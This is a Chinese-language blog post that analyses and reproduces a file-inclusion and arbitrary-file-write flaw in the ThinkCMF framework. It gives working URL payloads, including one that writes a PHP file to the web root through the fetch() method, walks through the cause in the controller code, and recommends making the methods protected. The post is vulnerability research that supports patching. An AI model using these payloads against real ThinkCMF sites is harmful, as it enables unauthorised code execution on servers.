ThinkCMF框架任意内容包含漏洞分析复现

0x00 CMS简介

ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。
ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。
每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。

0x01 漏洞简介

  • 攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。

  • 影响范围:

    ThinkCMF X1.6.0
    ThinkCMF X2.1.0
    ThinkCMF X2.2.0
    ThinkCMF X2.2.1
    ThinkCMF X2.2.2
    ThinkCMF X2.2.3

0x02 环境搭建

直接phpstudy一把梭
在这里插入图片描述

0x03 漏洞利用

1.通过构造a参数的display()方法,实现任意内容包含漏洞
payload:

?a=display&templateFile=README.md

在这里插入图片描述

2.通过构造a参数的fetch()方法,实现任意文件写入
payload:

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>

在这里插入图片描述
回车执行
可以看到根目录下新建的test.php
在这里插入图片描述
打开test.php
成功写入一句话
在这里插入图片描述

0x04 代码分析

首先看下入口文件
在这里插入图片描述

根据poc盲猜控制器IndexController.class.php

可以知道继承了HomebaseController,通过g\m\a参数指定分组\模块\方法,这里可以通过a参数直接调用Portal\IndexController父类(HomebaseController)中的一些权限为public的方法。
在这里插入图片描述
可以看的的public方法里就有display()fetch(),还有方法作用及参数含义。
display函数的作用是加载模板和页面输出,所对应的参数为:templateFile为模板文件地址,charset模板字符集,contentType输出类型,content输出内容。
在这里插入图片描述
templateFile参数会经过parseTemplate()方法处理。
\application\Common\Controller\AdminbaseController.class.phpparseTemplate()方法如下
在这里插入图片描述
parseTemplate()方法作用:判断模板主题是否存在,当模板主题不存在时会在当前目录下开始查找,形成文件包含。
在这里插入图片描述
fetch函数的作用是获取输出页面内容,调用内置模板引擎。
先判断content是否为空,不为空则templateFile参数会经过parseTemplate()方法处理

thinkphp的模版引擎使用的是smarty,在smarty中当key和value可控时便可以形成模板注入。

所以当templateFileprefix参数为空,在content参数传入php代码,便可以形成模板注入。

0x05 漏洞修复

HomebaseController.class.phpAdminbaseController.class.php类中displayfetch函数的修饰符改为protected

0x06 参考文章

https://xz.aliyun.com/t/6626#toc-5

posted @ 2019-12-20 08:56  吃不胖的ruanruan  阅读(238)  评论(0编辑  收藏  举报